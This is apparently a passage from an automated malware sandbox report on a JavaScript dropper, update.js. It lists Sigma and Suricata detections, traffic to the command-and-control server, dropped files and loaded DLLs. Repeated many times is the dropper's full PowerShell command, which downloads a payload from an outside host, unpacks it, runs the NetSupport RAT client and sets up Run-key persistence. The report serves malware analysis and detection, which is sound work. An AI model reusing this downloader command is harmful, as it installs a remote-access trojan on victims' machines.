exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 4992, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Pat
                      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4380, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ProcessId: 4992, ProcessName: wscript.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 4992, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Pat
                      Sigma detected: Windows Processes Suspicious Parent Directory
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6260, ProcessName: svchost.exe

                      Remote Access Functionality

                      barindex
                      Sigma detected: Powershell drops NetSupport RAT client
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6412, TargetFilename: C:\Users\user\AppData\Roaming\RYMB15\NSM.LIC

                      Suricata Signatures

                      Timestamp:2024-08-08T22:34:39.975150+0200
                      SID:2054858
                      Severity:1
                      Source Port:54365
                      Destination Port:53
                      Protocol:UDP
                      Classtype:Exploit Kit Activity Detected
                      Timestamp:2024-08-08T22:34:21.469423+0200
                      SID:2055002
                      Severity:1
                      Source Port:49701
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Exploit Kit Activity Detected
                      Timestamp:2024-08-08T22:34:20.655944+0200
                      SID:2055001
                      Severity:1
                      Source Port:51062
                      Destination Port:53
                      Protocol:UDP
                      Classtype:Exploit Kit Activity Detected
                      Timestamp:2024-08-08T22:35:55.311482+0200
                      SID:2055002
                      Severity:1
                      Source Port:49708
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Exploit Kit Activity Detected
                      Timestamp:2024-08-08T22:34:14.581870+0200
                      SID:2827745
                      Severity:1
                      Source Port:49705
                      Destination Port:443
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for URL or domain
                      Source: http://didsit.com/data.php?7211Avira URL Cloud: Label: malware
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\user\AppData\Roaming\RYMB15\HTCTL32.DLLReversingLabs: Detection: 13%
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeReversingLabs: Detection: 26%
                      Source: C:\Users\user\AppData\Roaming\RYMB15\remcmdstub.exeReversingLabs: Detection: 23%
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\RYMB15\msvcr100.dll
                      Source: unknownHTTPS traffic detected: 149.255.36.73:443 -> 192.168.2.16:49701 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.255.36.73:443 -> 192.168.2.16:49708 version: TLS 1.2

                      Software Vulnerabilities

                      barindex
                      Suspicious execution chain found
                      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                      Networking

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\System32\wscript.exeNetwork Connect: 149.255.36.73 443
                      Source: global trafficHTTP traffic detected: GET /data.php?7211 HTTP/1.1Host: didsit.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.181.159.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.181.159.28
                      Source: unknownTCP traffic detected without corresponding DNS query: 5.181.159.28
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /data.php?7211 HTTP/1.1Host: didsit.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                      Source: global trafficDNS traffic detected: DNS query: alphawatchrmf.com
                      Source: global trafficDNS traffic detected: DNS query: didsit.com
                      Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                      Source: unknownHTTP traffic detected: POST http://5.181.159.28/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 5.181.159.28Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                      Source: Network trafficSuricata IDS: 2055001 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (alphawatchrmf .com) : 192.168.2.16:51062 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2055002 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in TLS SNI (alphawatchrmf .com) : 192.168.2.16:49701 -> 149.255.36.73:443
                      Source: Network trafficSuricata IDS: 2054858 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (didsit .com) : 192.168.2.16:54365 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.16:49705 -> 5.181.159.28:443
                      Source: Network trafficSuricata IDS: 2055002 - Severity 1 - ET EXPLOIT_KIT ZPHP Domain in TLS SNI (alphawatchrmf .com) : 192.168.2.16:49708 -> 149.255.36.73:443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                      Source: unknownHTTPS traffic detected: 149.255.36.73:443 -> 192.168.2.16:49701 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.255.36.73:443 -> 192.168.2.16:49708 version: TLS 1.2
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\RYMB15\PCICL32.DLL, type: DROPPED
                      Source: Yara matchFile source: 0000000D.00000002.2485075495.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Powershell drops PE file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\RYMB15\pcicapi.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\RYMB15\HTCTL32.DLLJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\RYMB15\client32.exeJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\RYMB15\msvcr100.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\RYMB15\PCICL32.DLLJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\RYMB15\PCICHEK.DLLJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\RYMB15\remcmdstub.exeJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\RYMB15\TCCTL32.DLLJump to dropped file
                      Windows Scripting host queries suspicious COM object (likely to drop second stage)
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Server XML HTTP 6.0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88d96a0b-f192-11d4-a65f-0040963251e5}
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                      Wscript starts Powershell (via cmd or directly)
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeProcess token adjusted: Security
                      Source: update.jsInitial sample: Strings found which are bigger than 50
                      Source: classification engineClassification label: mal100.troj.expl.evad.winJS@8/26@3/66
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\RYMB15
                      Source: C:\Users\user\AppData\Roaming\RYMB15\client32.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_03
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wrxzavvq.rcd.ps1
                      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\update.js"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\RYMB15\client32.exe "C:\Users\user\AppData\Roaming\RYMB15\client32.exe"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $AWBH='http://didsit.com/data.php?7211';$RGOZCXQBN=(New-Object System.Net.WebClient).DownloadString($AWBH);$RWPJKWOD=[System.Convert]::FromBase64String($RGOZCXQBN);$asd = Get-Random -Minimum -10 -Maximum 17; $RNGB=[System.Environment]::GetFolderPath('ApplicationData')+'\RYMB'+$asd;if (!(Test-Path $RNGB -PathType Container)) { New-Item -Path $RNGB -ItemType Directory };$p=Join-Path $RNGB 'CCleaner.zip';[System.IO.File]::WriteAllBytes($p,$RWPJKWOD);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$RNGB)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $RNGB 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $RNGB -Force; $fd.attributes='Hidden';$s=$RNGB+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BCYLGMFSMV';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\RYMB15\client32.exe "C:\Users\user\AppData\Roaming\RYMB15\client32.exe"
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\update.js"
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: msxml6.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: webio.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
